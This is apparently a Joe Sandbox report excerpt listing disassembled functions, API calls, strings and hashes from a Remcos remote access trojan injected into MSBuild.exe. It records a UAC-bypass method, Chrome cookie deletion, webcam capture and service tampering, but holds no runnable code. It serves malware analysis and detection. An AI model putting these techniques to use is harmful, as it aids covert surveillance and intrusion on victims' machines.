                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                                                                        • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                                        • Opcode Fuzzy Hash: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                                                                        • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                                        Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                                        • int.LIBCPMT ref: 0040FC0F
                                                                                                                          • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                          • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                        • String ID: P[G
                                                                                                                        • API String ID: 2536120697-571123470
                                                                                                                        • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                                        • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                                        • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                                        • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                                        Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                                        • _free.LIBCMT ref: 0044FD29
                                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                        • _free.LIBCMT ref: 0044FD34
                                                                                                                        • _free.LIBCMT ref: 0044FD3F
                                                                                                                        • _free.LIBCMT ref: 0044FD93
                                                                                                                        • _free.LIBCMT ref: 0044FD9E
                                                                                                                        • _free.LIBCMT ref: 0044FDA9
                                                                                                                        • _free.LIBCMT ref: 0044FDB4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                        • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                                        • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                        • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                                        Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406835
                                                                                                                          • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                          • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                        • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                        • API String ID: 3851391207-1840432179
                                                                                                                        • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                        • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                        • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                        • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                        Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                        • int.LIBCPMT ref: 0040FEF2
                                                                                                                          • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                          • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                        • String ID: H]G
                                                                                                                        • API String ID: 2536120697-1717957184
                                                                                                                        • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                                        • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                                        • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                                        • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                                        Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                        • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                        Strings
                                                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                        • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                        • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                        • UserProfile, xrefs: 0040B2B4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                        • API String ID: 2018770650-304995407
                                                                                                                        • Opcode ID: dfe89a798b749c9bba519fdb19838f0c49607846c9f20ba5960bfc3478b55717
                                                                                                                        • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                                        • Opcode Fuzzy Hash: dfe89a798b749c9bba519fdb19838f0c49607846c9f20ba5960bfc3478b55717
                                                                                                                        • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                                        Function 0041BEB0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Console$AllocOutputShowWindow
                                                                                                                        • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                        • API String ID: 2425139147-2527699604
                                                                                                                        • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                                        • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                                        • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                                        • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                                        Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$BG
                                                                                                                        • API String ID: 0-3446331285
                                                                                                                        • Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                                        • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                        • Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                                        • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                        Function 00419F32 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                                        • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                                        • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                        • String ID: Alarm triggered$`#v
                                                                                                                        • API String ID: 614609389-3049340936
                                                                                                                        • Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                                        • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                                        • Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                                        • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                                        Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __allrem.LIBCMT ref: 00439789
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                                        • __allrem.LIBCMT ref: 004397BC
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                                        • __allrem.LIBCMT ref: 004397F1
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1992179935-0
                                                                                                                        • Opcode ID: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                                                        • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                                        • Opcode Fuzzy Hash: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                                                        • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                                        Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4189289331-0
                                                                                                                        • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                                                        • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                                        • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                                                        • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                                        Function 00446159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __freea$__alloca_probe_16
                                                                                                                        • String ID: a/p$am/pm
                                                                                                                        • API String ID: 3509577899-3206640213
                                                                                                                        • Opcode ID: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                                                        • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                                        • Opcode Fuzzy Hash: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                                                        • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                                        Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                          • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prologSleep
                                                                                                                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                                        • API String ID: 3469354165-462540288
                                                                                                                        • Opcode ID: 6d6b6c617a36415e3d62c7ab1bf0d5ca04a15291306e93b380526c2cac81f15c
                                                                                                                        • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                                        • Opcode Fuzzy Hash: 6d6b6c617a36415e3d62c7ab1bf0d5ca04a15291306e93b380526c2cac81f15c
                                                                                                                        • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                                        Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 493672254-0
                                                                                                                        • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                                        • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                                        • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                                        • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                                        Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3852720340-0
                                                                                                                        • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                        • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                                        • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                        • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                                        Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                        • _free.LIBCMT ref: 00446EF6
                                                                                                                        • _free.LIBCMT ref: 00446F1E
                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                        • _abort.LIBCMT ref: 00446F3D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3160817290-0
                                                                                                                        • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                        • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                                        • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                        • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                                        Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 221034970-0
                                                                                                                        • Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                                        • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                                        • Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                                        • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                                        Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 221034970-0
                                                                                                                        • Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                                        • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                                        • Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                                        • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                                        Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
